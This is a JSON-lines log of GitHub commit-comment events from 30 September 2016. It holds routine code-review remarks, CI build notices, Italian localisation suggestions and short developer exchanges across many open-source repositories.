{"id":"4644409425","type":"CommitCommentEvent","actor":{"login":"electron0zero"},"repo":{"name":"WhitestormJS/whitestorm.js"},"payload":{"comment":{"id":19243806,"position":5,"line":35,"path":"test/unit/core/camera.spec.js","commit_id":"e6dbae904bbed0c21cdf809e104a0b28f1e42277","created_at":"2016-09-30T16:16:52Z","updated_at":"2016-09-30T16:16:52Z","body":"@sasha240100 got it"}},"created_at":"2016-09-30T16:16:52Z"}
{"id":"4644418373","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19243839,"position":null,"line":null,"path":null,"commit_id":"e2852052acb54bc8a6b52251efde18c4fc9223f3","created_at":"2016-09-30T16:18:34Z","updated_at":"2016-09-30T16:18:34Z","body":"@Keital Thx Bro :octocat: "}},"created_at":"2016-09-30T16:18:34Z"}
{"id":"4644419462","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243843,"position":null,"line":null,"path":null,"commit_id":"f08f2a9bb3de6ef974dce96756f7fd74e23a0297","created_at":"2016-09-30T16:18:47Z","updated_at":"2016-09-30T16:18:47Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 31](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33127&buildTypeId=PlatformServices_EnvironmentManager_RunTests) outcome was **SUCCESS**\nSummary: Tests passed: 421 Build time: 00:03:50"}},"created_at":"2016-09-30T16:18:47Z"}
{"id":"4644419848","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19243845,"position":null,"line":null,"path":null,"commit_id":"fe2e119b251dd2c732fe0d20d08ac1ac61f836d2","created_at":"2016-09-30T16:18:52Z","updated_at":"2016-09-30T16:18:52Z","body":"Frankly, I'm not sure this was truly a typo; \"reservoir\" seems no less of a strange word for this than \"reservior\"."}},"created_at":"2016-09-30T16:18:52Z"}
{"id":"4644419919","type":"CommitCommentEvent","actor":{"login":"gbl3"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19243846,"position":null,"line":null,"path":null,"commit_id":"dfab3d15363ad13e3646570e3e0d0a10babe306d","created_at":"2016-09-30T16:18:53Z","updated_at":"2016-09-30T16:18:53Z","body":"@fbormann aqui"}},"created_at":"2016-09-30T16:18:53Z"}
{"id":"4644420824","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19243850,"position":6,"line":242,"path":"src/ng/anchorScroll.js","commit_id":"9062bae05c002934fe7bfd76043dcc3de9acfde6","created_at":"2016-09-30T16:19:01Z","updated_at":"2016-09-30T16:19:01Z","body":"We shouldn't stringify everything (e.g. `undefined`, `null`). And stringifying accidentally passed non-string values (such as objects or arrays) doesn't seem useful. #14680 explains the usecase for numbers, which didn't sound unreasonable or uncommon.\r\n\r\n<sub>(I like mildly nested ternaries 😇, but I am always up for consistency too :smiley:)</sub>"}},"created_at":"2016-09-30T16:19:01Z"}
{"id":"4644425634","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19243872,"position":5,"line":61,"path":"src/mods/chat.js","commit_id":"eb092083c2a83c7993c99092ceae44cf03561e77","created_at":"2016-09-30T16:20:01Z","updated_at":"2016-09-30T16:20:01Z","body":"at least all in the promotion modes array"}},"created_at":"2016-09-30T16:20:01Z"}
{"id":"4644426976","type":"CommitCommentEvent","actor":{"login":"christophermancini"},"repo":{"name":"basho/riak-ruby-client"},"payload":{"comment":{"id":19243877,"position":5,"line":18,"path":"spec/integration/riak/encodings/crdt_spec.rb","commit_id":"cbf338816dbda89a773a9ff885dc9ba14a1c66a8","created_at":"2016-09-30T16:20:15Z","updated_at":"2016-09-30T16:20:15Z","body":"Sorry, on phone. I meant we should probably use this constant so that if we have to update it, there is only one place.  \r\n\r\nRiak::Crdt::DEFAULT_BUCKET_TYPES[:hll] "}},"created_at":"2016-09-30T16:20:15Z"}
{"id":"4644427099","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243878,"position":null,"line":null,"path":null,"commit_id":"f08f2a9bb3de6ef974dce96756f7fd74e23a0297","created_at":"2016-09-30T16:20:16Z","updated_at":"2016-09-30T16:20:16Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 32](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33128&buildTypeId=PlatformServices_EnvironmentManager_RunTests) outcome was **SUCCESS**\nSummary: Tests passed: 421 Build time: 00:03:39"}},"created_at":"2016-09-30T16:20:16Z"}
{"id":"4644428506","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243882,"position":32,"line":29,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:20:31Z","updated_at":"2016-09-30T16:20:31Z","body":"\"Base militante\" mi sembra un po' forte come espressione. Ne sono già state proposte tante, ma una possibile alternativa:\r\nOperando allo stesso tempo insieme ai movimenti spontanei della comunità e a livello legislativo,\r\n\r\nInoltre, rileggendolo, quel \"forniamo strumenti\" messo lì così sembra un po' tronco. Che genere di strumenti?\r\nIo la rimescolerei così:\r\nmettiamo a disposizione gli strumenti per diffondere l'alfabetizzazione web e difendiamo i diritti di tutti coloro che credono nei valori di equità, inclusione e rispetto reciproco.\r\n\r\n"}},"created_at":"2016-09-30T16:20:31Z"}
{"id":"4644430534","type":"CommitCommentEvent","actor":{"login":"henriquementz"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19243889,"position":28,"line":27,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"ceda95fdd680d9f946af00fb83ef9cdc73c3b34d","created_at":"2016-09-30T16:20:54Z","updated_at":"2016-09-30T16:20:54Z","body":"melhorei a lógica. corrigido!"}},"created_at":"2016-09-30T16:20:54Z"}
{"id":"4644432075","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19243894,"position":null,"line":null,"path":null,"commit_id":"e2852052acb54bc8a6b52251efde18c4fc9223f3","created_at":"2016-09-30T16:21:12Z","updated_at":"2016-09-30T16:21:12Z","body":"@Bodeguero i feel same :(. Maybe a hard reset will do better? so we can clean all that shit what do you think"}},"created_at":"2016-09-30T16:21:12Z"}
{"id":"4644435318","type":"CommitCommentEvent","actor":{"login":"brentpabst"},"repo":{"name":"DudeSolutions/DudeUnifiedApi"},"payload":{"comment":{"id":19243914,"position":null,"line":null,"path":null,"commit_id":"7cb0f12a7968134c5f9e46124ae696c04f6e4847","created_at":"2016-09-30T16:21:49Z","updated_at":"2016-09-30T16:21:49Z","body":"__API Description file syntax error on line 606__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-30T16:21:49Z"}
{"id":"4644441182","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"ZedCee/various_graphics"},"payload":{"comment":{"id":19243934,"position":null,"line":null,"path":null,"commit_id":"262646528fdd4d1ed4d20600520d50f3eb4df98d","created_at":"2016-09-30T16:22:57Z","updated_at":"2016-09-30T16:22:57Z","body":"OK if you can't build one it's OK. Thanks\n"}},"created_at":"2016-09-30T16:22:57Z"}
{"id":"4644444026","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19243942,"position":null,"line":null,"path":null,"commit_id":"e2852052acb54bc8a6b52251efde18c4fc9223f3","created_at":"2016-09-30T16:23:30Z","updated_at":"2016-09-30T16:23:30Z","body":"@Keital Let me solve!"}},"created_at":"2016-09-30T16:23:30Z"}
{"id":"4644447658","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243954,"position":284,"line":406,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:24:14Z","updated_at":"2016-09-30T16:24:14Z","body":"Impossibile trovare la newsletter %s\r\nLa newsletter %s non esiste"}},"created_at":"2016-09-30T16:24:14Z"}
{"id":"4644452066","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"bgrainger/MySqlConnector"},"payload":{"comment":{"id":19243970,"position":null,"line":null,"path":null,"commit_id":"09b45fce026fdc77db94ab9262de10f414ed85a0","created_at":"2016-09-30T16:25:04Z","updated_at":"2016-09-30T16:25:04Z","body":"> Here's what I'm seeing with await `socket.ConnectAsync(ipAddress, port)`\r\n\r\nInteresting: When I switch this to `socket.Connect()` for syncIO, I still only see 5 connections initially opened when 10K requests come in.  It seems as if the threads may be getting held up elsewhere.  I'll do some further investigation.\r\n\r\nOnce the thread pool is populated, things seem to be running pretty smoothly in both sync and async performance tests"}},"created_at":"2016-09-30T16:25:04Z"}
{"id":"4644453954","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243989,"position":293,"line":414,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:25:27Z","updated_at":"2016-09-30T16:25:27Z","body":"L'indirizzo email non è valido. Controlla di averlo digitato correttamente."}},"created_at":"2016-09-30T16:25:27Z"}
{"id":"4644458669","type":"CommitCommentEvent","actor":{"login":"cyberswat"},"repo":{"name":"drud/drud-go"},"payload":{"comment":{"id":19244001,"position":null,"line":null,"path":null,"commit_id":"328ec5d0280ba6ed8c313ac46922c65b838e5bb7","created_at":"2016-09-30T16:26:21Z","updated_at":"2016-09-30T16:26:21Z","body":"There should have totally been a test to accompany this."}},"created_at":"2016-09-30T16:26:21Z"}
{"id":"4644468920","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19244028,"position":298,"line":418,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:28:13Z","updated_at":"2016-09-30T16:28:13Z","body":"Grazie per il tuo interesse verso il prossimo Firefox per iOS. Anche noi non vediamo l'ora di provarlo!"}},"created_at":"2016-09-30T16:28:13Z"}
{"id":"4644469727","type":"CommitCommentEvent","actor":{"login":"mdolz"},"repo":{"name":"mdolz/PMLib"},"payload":{"comment":{"id":19244033,"position":4,"line":330,"path":"new/pmlib/server.cpp","commit_id":"e524f0f1ad2d909ac0b9a0123e03f1ac7eabbb71","created_at":"2016-09-30T16:28:22Z","updated_at":"2016-09-30T16:28:22Z","body":"This can be written as follows, so it's not mandatory to set the \"metric\" attribute in the json.\r\nl.get(\"metric\", \"default\" ).asString()"}},"created_at":"2016-09-30T16:28:22Z"}
{"id":"4644472809","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19244045,"position":null,"line":null,"path":null,"commit_id":"af52f5c030fedf31c13eb5270510198c617aab9a","created_at":"2016-09-30T16:28:59Z","updated_at":"2016-09-30T16:28:59Z","body":"Cool, I've learned something about this that I didn't know about!  Ok, now your code makes sense to me."}},"created_at":"2016-09-30T16:28:59Z"}
{"id":"4644474709","type":"CommitCommentEvent","actor":{"login":"GuaiYiHu"},"repo":{"name":"GuaiYiHu/android_device_meizu_arale"},"payload":{"comment":{"id":19244056,"position":null,"line":null,"path":null,"commit_id":"0f089fbc7be3f01456b20bc848b3597ba45c4071","created_at":"2016-09-30T16:29:20Z","updated_at":"2016-09-30T16:29:20Z","body":"Okay, thanks a lot, guy! "}},"created_at":"2016-09-30T16:29:20Z"}
{"id":"4644475063","type":"CommitCommentEvent","actor":{"login":"jodiewijermars"},"repo":{"name":"jodiewijermars/Homework-repository-JW"},"payload":{"comment":{"id":19244057,"position":null,"line":null,"path":null,"commit_id":"a15eec8a39116afae50b5c89a075b34d2f636b74","created_at":"2016-09-30T16:29:24Z","updated_at":"2016-09-30T16:29:24Z","body":"test this github "}},"created_at":"2016-09-30T16:29:24Z"}
{"id":"4644475110","type":"CommitCommentEvent","actor":{"login":"aembler"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19244058,"position":null,"line":null,"path":null,"commit_id":"a3f0e4bfc080e992bd2cc4765c5fc496c04da6ea","created_at":"2016-09-30T16:29:24Z","updated_at":"2016-09-30T16:29:24Z","body":"Looks like this commit broke tests. getClass() is no longer static, actually; it's part of the service class that's wrapped in a facade, so Package::getClass() can be called statically, while the service class is definitely not static any longer. This line of non-static calling was breaking tests\r\n\r\n                $x = $app->make('Concrete\\Core\\Package\\PackageService')->getClass($prefix);\r\n\r\nI am reverting this commit. "}},"created_at":"2016-09-30T16:29:24Z"}
{"id":"4644476847","type":"CommitCommentEvent","actor":{"login":"ianfisk"},"repo":{"name":"WWU-iCharts/iCharts"},"payload":{"comment":{"id":19244064,"position":null,"line":null,"path":null,"commit_id":"2a637575737b9d277e3f2cd9b964c55a2ee96850","created_at":"2016-09-30T16:29:46Z","updated_at":"2016-09-30T16:29:46Z","body":"test comment"}},"created_at":"2016-09-30T16:29:46Z"}
{"id":"4644477405","type":"CommitCommentEvent","actor":{"login":"maxbonomi"},"repo":{"name":"plumed/plumed2"},"payload":{"comment":{"id":19244066,"position":null,"line":null,"path":null,"commit_id":"21b5e2ea97ce32b9fe654d7ac585acac5a445e33","created_at":"2016-09-30T16:29:51Z","updated_at":"2016-09-30T16:29:51Z","body":"Thanks Giovanni, but I have already moved to VectorGeneric<9>.\nStill trying to find out why things in serial are 2 times faster on my laptop wrt our cluster.\nMoving things from Matrix to VectorGeneric<9> is bringing things from 10 times slower to only 2 :-(\n\n\n> On Sep 30, 2016, at 17:57, Giovanni <notifications@github.com> wrote:\n> \n> @maxbonomi if size is fixed you can use Tensor so that you can access with [i][j] syntax.\n> This should be as fast as VectorGeneric<9>, perhaps with a better syntax. Matrix is only good for large objects of unknown size.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-30T16:29:51Z"}
{"id":"4644482661","type":"CommitCommentEvent","actor":{"login":"jodiewijermars"},"repo":{"name":"jodiewijermars/Homework-repository-JW"},"payload":{"comment":{"id":19244077,"position":null,"line":null,"path":null,"commit_id":"a15eec8a39116afae50b5c89a075b34d2f636b74","created_at":"2016-09-30T16:30:47Z","updated_at":"2016-09-30T16:30:47Z","body":"this is a comment to myself to test"}},"created_at":"2016-09-30T16:30:47Z"}
{"id":"4644486006","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19244084,"position":6,"line":242,"path":"src/ng/anchorScroll.js","commit_id":"9062bae05c002934fe7bfd76043dcc3de9acfde6","created_at":"2016-09-30T16:31:23Z","updated_at":"2016-09-30T16:31:23Z","body":"People might still get surprised if they use `<div id=\"123456789123456789\"></div>. Code `$anchorScroll(123456789123456789)` won't work but `$anchorScroll('123456789123456789')` will.\r\n\r\nIt'd be better if people used correct input types. ;)"}},"created_at":"2016-09-30T16:31:23Z"}
{"id":"4644486078","type":"CommitCommentEvent","actor":{"login":"shabiel"},"repo":{"name":"shabiel/fis-gtm"},"payload":{"comment":{"id":19244087,"position":38,"line":159,"path":"sr_darwin/obj_filesp.c","commit_id":"bc0e1bf17136f920b46ac14f7384749ef4fa015d","created_at":"2016-09-30T16:31:27Z","updated_at":"2016-09-30T16:31:27Z","body":"Thank you Chris.\n\nOn Fri, Sep 30, 2016 at 8:32 AM, Christopher Edwards <\nnotifications@github.com> wrote:\n\n> In the final version of this the comment should be updated to be mach-o\n> instead of ELF\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/shabiel/fis-gtm/commit/bc0e1bf17136f920b46ac14f7384749ef4fa015d#commitcomment-19240210>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABEtwqzG973a1CvrimCYd0Jtf_x2UYSoks5qvQFSgaJpZM4KLCaU>\n> .\n>\n"}},"created_at":"2016-09-30T16:31:27Z"}
{"id":"4644489214","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19244093,"position":null,"line":null,"path":null,"commit_id":"806e00434c34aa6c3911c2148292902f2782ffdb","created_at":"2016-09-30T16:32:03Z","updated_at":"2016-09-30T16:32:03Z","body":"Hmm, lists of heterogeneous elements are bad calling conventions too.  Way better to make a new 'data structure' (aka unevaluated function call), or even a record, rather than abusing lists in this way."}},"created_at":"2016-09-30T16:32:03Z"}
{"id":"4644491027","type":"CommitCommentEvent","actor":{"login":"PaphosAL"},"repo":{"name":"UkCvs/commando"},"payload":{"comment":{"id":19244095,"position":null,"line":null,"path":null,"commit_id":"9c5a42aa08d5e9c6fc29209ddd90046c77e1f28e","created_at":"2016-09-30T16:32:23Z","updated_at":"2016-09-30T16:32:23Z","body":"What was that all about, then? "}},"created_at":"2016-09-30T16:32:23Z"}
{"id":"4644491612","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19244099,"position":345,"line":475,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:32:28Z","updated_at":"2016-09-30T16:32:28Z","body":"Il link in questione > questo link"}},"created_at":"2016-09-30T16:32:28Z"}
{"id":"4644491825","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":19244100,"position":5,"line":75,"path":"KPH.html","commit_id":"dc76f87736335d93401bbd583099de7b001a0b03","created_at":"2016-09-30T16:32:29Z","updated_at":"2016-09-30T16:32:29Z","body":"これ何のためのコード？\r\n何故キッズプラザのページでクラス名がkids?"}},"created_at":"2016-09-30T16:32:29Z"}
{"id":"4644494034","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_external_chromium-webview"},"payload":{"comment":{"id":19244112,"position":null,"line":null,"path":null,"commit_id":"47b69cb442b55180422bad336eb4505cbfe1b47b","created_at":"2016-09-30T16:32:54Z","updated_at":"2016-09-30T16:32:54Z","body":"What commits have you used to compile latest WebView without black screen?"}},"created_at":"2016-09-30T16:32:54Z"}
{"id":"4644495792","type":"CommitCommentEvent","actor":{"login":"jollaman999"},"repo":{"name":"jollaman999/jolla-kernel_bullhead"},"payload":{"comment":{"id":19244119,"position":null,"line":null,"path":null,"commit_id":"3fd953cb68c3f23ba95ad59f753fdb65a4b24612","created_at":"2016-09-30T16:33:13Z","updated_at":"2016-09-30T16:33:13Z","body":"It needs a fix for M.\r\n\r\n4a90035"}},"created_at":"2016-09-30T16:33:13Z"}
{"id":"4644497184","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":19244124,"position":5,"line":75,"path":"KPH.html","commit_id":"dc76f87736335d93401bbd583099de7b001a0b03","created_at":"2016-09-30T16:33:29Z","updated_at":"2016-09-30T16:33:29Z","body":"ではなくfuture？\r\n"}},"created_at":"2016-09-30T16:33:29Z"}
{"id":"4644498865","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_external_chromium-webview"},"payload":{"comment":{"id":19244131,"position":null,"line":null,"path":null,"commit_id":"47b69cb442b55180422bad336eb4505cbfe1b47b","created_at":"2016-09-30T16:33:49Z","updated_at":"2016-09-30T16:33:49Z","body":"Or is GN config enough to build latest WebView?"}},"created_at":"2016-09-30T16:33:49Z"}
{"id":"4644502873","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19244142,"position":430,"line":555,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:34:35Z","updated_at":"2016-09-30T16:34:35Z","body":"per ciò che riguarda > sul, riguardo"}},"created_at":"2016-09-30T16:34:35Z"}
{"id":"4644504410","type":"CommitCommentEvent","actor":{"login":"kazekage605"},"repo":{"name":"kazekage605/20161001"},"payload":{"comment":{"id":19244146,"position":null,"line":null,"path":null,"commit_id":"f5b00ae1ee9e93404949d374022a8e23547883e8","created_at":"2016-09-30T16:34:52Z","updated_at":"2016-09-30T16:34:52Z","body":"write at 10/01/2016"}},"created_at":"2016-09-30T16:34:52Z"}
{"id":"4644505683","type":"CommitCommentEvent","actor":{"login":"DX-MON"},"repo":{"name":"DX-MON/tmplORM"},"payload":{"comment":{"id":19244151,"position":null,"line":null,"path":null,"commit_id":"1864aa0b6b8c4f1741cd11cee55d9d8c5511652c","created_at":"2016-09-30T16:35:07Z","updated_at":"2016-09-30T16:35:07Z","body":"Line 58 is incorrect here as a 3-unit UTF-8 sequence cannot exceed the max allowed from a 1-unit UTF-16 sequence. Rather, this check should actually be\r\n```\r\nelse if ((byteA & 0x0F) == 0x0D) && (byteB & 0x20))\r\n    return 0;\r\n```\r\n\r\nConversion can be accomplished with:\r\n\r\n```\r\nutf16_t utf16::convert(const char *const str) noexcept\r\n{\r\n   const size_t lenUTF8 = strlen(str) + 1;\r\n   const size_t lenUTF16 = countUnits(str);\r\n   auto result = makeUnique<char16_t []>(countUnits);\r\n   if (!result || !lenUTF16)\r\n       return nullptr;\r\n\r\n    for (size_t i = 0, j = 0; i < lenUTF8; ++i, ++j)\r\n    {\r\n        const char byteA = str[i];\r\n        if (byteA & 0x80)\r\n        {\r\n            const char byteB = safeIndex(str, ++i, lenUTF8);\r\n            if ((byteA & 0x60) == 0x40)\r\n                result[j] = (char16_t(byteA & 0x1F) << 6) | char16_t(byteB & 0x3F);\r\n            else if ((byteA & 0x70) == 0x60)\r\n            {\r\n                const char byteC = safeIndex(str, ++i, lenUTF8);\r\n                result[j] = (char16_t(byteA & 0x0F) << 12) | (char16_t(byteB & 0x3F) << 6) | char16_t(byteC & 0x3F);\r\n            }\r\n            else\r\n            {\r\n                const char byteC = safeIndex(str, ++i, lenUTF8);\r\n                const char byteD = safeIndex(str, ++i, lenUTF8);\r\n                // First, collect the upper 11 bits into a value..\r\n                const char16_t upper = (char16_t(byteA & 0x07) << 8) | (char16_t(byteB & 0x3F) << 2) | (char16_t(byteC & 0x30) >> 8);\r\n                // Then take off the (0x010000 >> 10) value, and generate the first part of the surrogate pair\r\n                result[j] = char16_t(0xD800) | (upper - 0x0040);\r\n                // Then collect together the lower 10 bits and generate the second part of the surrogate pair\r\n                result[++j] = char16_t(0xDC00) | (char16_t(byteC & 0x0F) << 6) | char16_t(byteD & 0x3F);\r\n            }\r\n        }\r\n        else\r\n            result[j] = char16_t(byteA);\r\n    }\r\n    return result;\r\n}\r\n```"}},"created_at":"2016-09-30T16:35:07Z"}
{"id":"4644507138","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19244158,"position":null,"line":null,"path":null,"commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:35:23Z","updated_at":"2016-09-30T16:35:23Z","body":"Grazie, ho messo alcuni suggerimenti"}},"created_at":"2016-09-30T16:35:23Z"}
{"id":"4644514614","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/sails.io.js"},"payload":{"comment":{"id":19244182,"position":null,"line":null,"path":null,"commit_id":"25ae952a5c0a7fdc6b1ebfd1dffe8c79e954713f","created_at":"2016-09-30T16:36:49Z","updated_at":"2016-09-30T16:36:49Z","body":"For more details, see: https://github.com/socketio/engine.io-client/issues/494#issuecomment-250783287"}},"created_at":"2016-09-30T16:36:49Z"}
{"id":"4644515037","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244183,"position":null,"line":null,"path":null,"commit_id":"eab5a289079b042cf00f50cb5e590e3e70abb9b7","created_at":"2016-09-30T16:36:53Z","updated_at":"2016-09-30T16:36:53Z","body":"@Bodeguero Done reverting all my stuff, at home will check all inhere i dont have VS\r\n"}},"created_at":"2016-09-30T16:36:53Z"}
{"id":"4644515495","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244186,"position":null,"line":null,"path":null,"commit_id":"66ae6202b681dc86831e7723ef639acc54dd2f00","created_at":"2016-09-30T16:36:59Z","updated_at":"2016-09-30T16:36:59Z","body":"@Keital 😋 \r\n\r\nOur how you did it? No modified file LoL\r\n\r\nRsRs"}},"created_at":"2016-09-30T16:36:59Z"}
{"id":"4644524734","type":"CommitCommentEvent","actor":{"login":"trash"},"repo":{"name":"sammcgrail/dashmock"},"payload":{"comment":{"id":19244218,"position":44,"line":122,"path":"highchartsmockup.js","commit_id":"624656cd1cf658261324a7da88bfcf173e57e651","created_at":"2016-09-30T16:38:47Z","updated_at":"2016-09-30T16:38:47Z","body":"No need for first `var randNum`"}},"created_at":"2016-09-30T16:38:47Z"}
{"id":"4644527190","type":"CommitCommentEvent","actor":{"login":"Ardenian"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19244225,"position":4,"line":60,"path":"src/mods/chat.js","commit_id":"b050007fa52cf28187f5bbf529ae5dd1c937f093","created_at":"2016-09-30T16:39:17Z","updated_at":"2016-09-30T16:39:17Z","body":"Remember you said leave everything as it is, might need to reset the labels in promotions"}},"created_at":"2016-09-30T16:39:17Z"}
{"id":"4644529909","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244238,"position":null,"line":null,"path":null,"commit_id":"eab5a289079b042cf00f50cb5e590e3e70abb9b7","created_at":"2016-09-30T16:39:48Z","updated_at":"2016-09-30T16:39:48Z","body":"@Keital As I said I will solve - I do the test in both Windows and Linux before sending any update 🍡 "}},"created_at":"2016-09-30T16:39:48Z"}
{"id":"4644530972","type":"CommitCommentEvent","actor":{"login":"danielsun1106"},"repo":{"name":"danielsun1106/groovy-parser"},"payload":{"comment":{"id":19244242,"position":null,"line":null,"path":null,"commit_id":"27291391f3387e1aadbe6a34e287820294c6ad93","created_at":"2016-09-30T16:40:00Z","updated_at":"2016-09-30T16:40:00Z","body":"@sharwell\r\nSam, I find your optimized version of antlr4 is very efficient when using clearDFA to avoid OutOfMemoryError. 4331 test cases are tested on my local machine, the reference release costs about 6m10s, the optimized release costs about 3m45s. That's great!"}},"created_at":"2016-09-30T16:40:00Z"}
{"id":"4644535187","type":"CommitCommentEvent","actor":{"login":"Ardenian"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19244253,"position":6,"line":11,"path":"src/mods/text.js","commit_id":"b050007fa52cf28187f5bbf529ae5dd1c937f093","created_at":"2016-09-30T16:40:47Z","updated_at":"2016-09-30T16:40:47Z","body":"Mixed some stuff I initially collected elsewhere, raid.js or ui.js, gonna need to clean that up"}},"created_at":"2016-09-30T16:40:47Z"}
{"id":"4644536490","type":"CommitCommentEvent","actor":{"login":"katiebvogel"},"repo":{"name":"katiebvogel/first_rails_app"},"payload":{"comment":{"id":19244256,"position":5,"line":null,"path":"README.md","commit_id":"ed148934d12afeadc39ae0311909de44d413d2fb","created_at":"2016-09-30T16:41:02Z","updated_at":"2016-09-30T16:41:02Z","body":"Trying to make an update and mobile commit."}},"created_at":"2016-09-30T16:41:02Z"}
{"id":"4644537472","type":"CommitCommentEvent","actor":{"login":"haydenth"},"repo":{"name":"rebeccahughes/react-native-device-info"},"payload":{"comment":{"id":19244259,"position":null,"line":null,"path":null,"commit_id":"299e45935e91ff88fb5eddc30529ed379b9788f4","created_at":"2016-09-30T16:41:13Z","updated_at":"2016-09-30T16:41:13Z","body":"Hi - is there any way we can get an npm release so this goes in there? Thanks!"}},"created_at":"2016-09-30T16:41:13Z"}
{"id":"4644540128","type":"CommitCommentEvent","actor":{"login":"jonom"},"repo":{"name":"silverstripe/silverstripe-framework"},"payload":{"comment":{"id":19244266,"position":13,"line":441,"path":"model/ArrayList.php","commit_id":"4998b8044530a83c617194d544b76a98f742386e","created_at":"2016-09-30T16:41:47Z","updated_at":"2016-09-30T16:41:47Z","body":"I think this might have introduced a bug for sorting negative numeric values: https://github.com/silverstripe/silverstripe-framework/issues/6124"}},"created_at":"2016-09-30T16:41:47Z"}
{"id":"4644541311","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244273,"position":null,"line":null,"path":null,"commit_id":"66ae6202b681dc86831e7723ef639acc54dd2f00","created_at":"2016-09-30T16:42:03Z","updated_at":"2016-09-30T16:42:03Z","body":"@Bodeguero Hahah this is basically the same you did in here: eab5a289079b042cf00f50cb5e590e3e70abb9b7\r\nso no changes where made when i pushed, all thing already was done by you"}},"created_at":"2016-09-30T16:42:03Z"}
